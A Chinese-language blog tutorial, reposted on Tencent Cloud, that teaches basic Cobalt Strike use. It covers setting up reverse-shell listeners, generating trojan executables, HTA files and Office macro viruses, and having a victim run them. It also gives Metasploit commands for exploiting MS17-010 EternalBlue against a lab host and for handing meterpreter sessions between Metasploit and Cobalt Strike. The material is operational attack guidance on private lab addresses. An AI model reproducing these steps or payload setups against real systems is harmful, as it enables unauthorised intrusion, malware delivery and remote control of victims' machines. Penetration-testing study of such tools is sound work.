首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >​Cobalt Strike基础使用

​Cobalt Strike基础使用

作者头像
ICT系统集成阿祥
发布2025-07-04 10:19:22
发布2025-07-04 10:19:22
1930
举报
文章被收录于专栏:数通数通

文章作者:华盟安全团队-- Gaowu

Cobalt Strike分为客户端组件和服务器组件,服务器的组件也是团队服务器,可以放在局域网或者公网下进行团队使用,也是Cobalt Strike社会工程功能的托管机器,团队服务器还可以存储由Cobalt Strike收集的数据,并且进行日志管理。

Cobalt Strike服务器必须在Linux系统上运行,这里演示服务器在Linux KALI端,本地进行Cobalt Strike客户端的连接。

CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包。

CS使用

启动CS服务端

启动客户端

服务端启动后客户端启动进行连接(团队多人连接将用户名设置为自己的用来区分团队成员)

主界面

CS功能使用(主机上线)

1.设置监听器用来接收会话

name:监听器名字

payload:payload类型

Host: shell反弹的主机,kali IP

Port: 反弹端口

图片
图片

这里Payload有9种选项,如下:

内部的Listener

windows/beacon_dns/reverse_dns_txt

windows/beacon_dns/reverse_http

windows/beacon_http/reverse_http

windows/beacon_https/reverse_https 

windows/beacon_smb/bind_pipe

外部的Listener

windows/foreign/reverse_dns_txt

windows/foreign/reverse_http

windows/foreign/reverse_https

windows/foreign/reverse_tcp

Beacon为内置的监听器,在目标主机执行相应的payload,获取shell到cs上;其中包含DNS、HTTP、HTTPS等,Beacon可以选择通过DNS还是HTTP/S协议出口网络,甚至可以在使用Beacon通讯过程中切换HTTP和DNS。其支持多主机连接,部署好Beacon后提交一个要连回的域名或主机的列表,Beacon将通过这些主机轮询。目标网络的防护团队必须拦截所有的列表中的主机才可中断和其网络的通讯。通过种种方式获取shell以后(比如直接运行生成的exe),就可以使用Beacon了。

Foreign为外部结合的Listener,经常用于MSF的结合,例如获取meterpreter到MSF上。

2.生成木马

HTML Application 生成恶意的HTA木马文件; MS Office Macro 生成office宏病毒文件; Payload Generator 生成各种语言版本的payload; Windows Executable 生成可执行exe木马; Windows Executable(S) 生成无状态的可执行exe木马

图片
图片
图片
图片

生成后会保存到指定地方,通过某种方式上传到对方机器上,可以通过Webshell方式等这里不在讲解了

受害者运行exe文件我们的CS就直接上线了

图片
图片

这是生成exe文件,还可以生成宏病毒等上面介绍到的。

3.正常我们进去需要调整响应的时间,sleep 3 就行。

图片
图片
图片
图片

可以对我们上线的机器进行以下操作,也可以联动MSF进行使用

图片
图片

联动MSF使用

将MSF的会话转发到CS上

通过漏洞复现演示MSF获取目标Session

KALI:192.168.50.218

CS:192.168.50.130

受害者IP:192.168.50.185

1.发现漏洞

Nmap -A扫描目标开放了445端口

图片
图片

通过使用MSF辅助模块扫描发现存在ms17_010漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.50.185

exploit

图片
图片

查找漏洞利用模块

图片
图片

漏洞利用

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set RHOST 192.168.50.185

Run

图片
图片

获取后 我们background获取session

图片
图片

与CS联动,将会话转发到CS中

CS配置新建一个监听

图片
图片

KALI中配置

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set DisablePayloadHandler true

set lhost 192.168.50.218  //KALI IP

set lport 4443 与CS同端口

set session 1

CS这边就接收到了MSF的会话

CS的会话转发到MSF中

由于生成的木马就是HTTP的,所以委派给msf时,监听器还是HTTP的

CS添加一个监听器

MSF准备

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_http

Set lhost ip

Set lport ip

设置完成后我们就可以使用CS进行委派会话了

选中我们刚刚创建的就行

这样我们的MSF端就会获取到这个会话

CS还有非常多的功能,大家慢慢发现

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-07-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 ICT系统集成阿祥 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • CS使用
  • 联动MSF使用
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档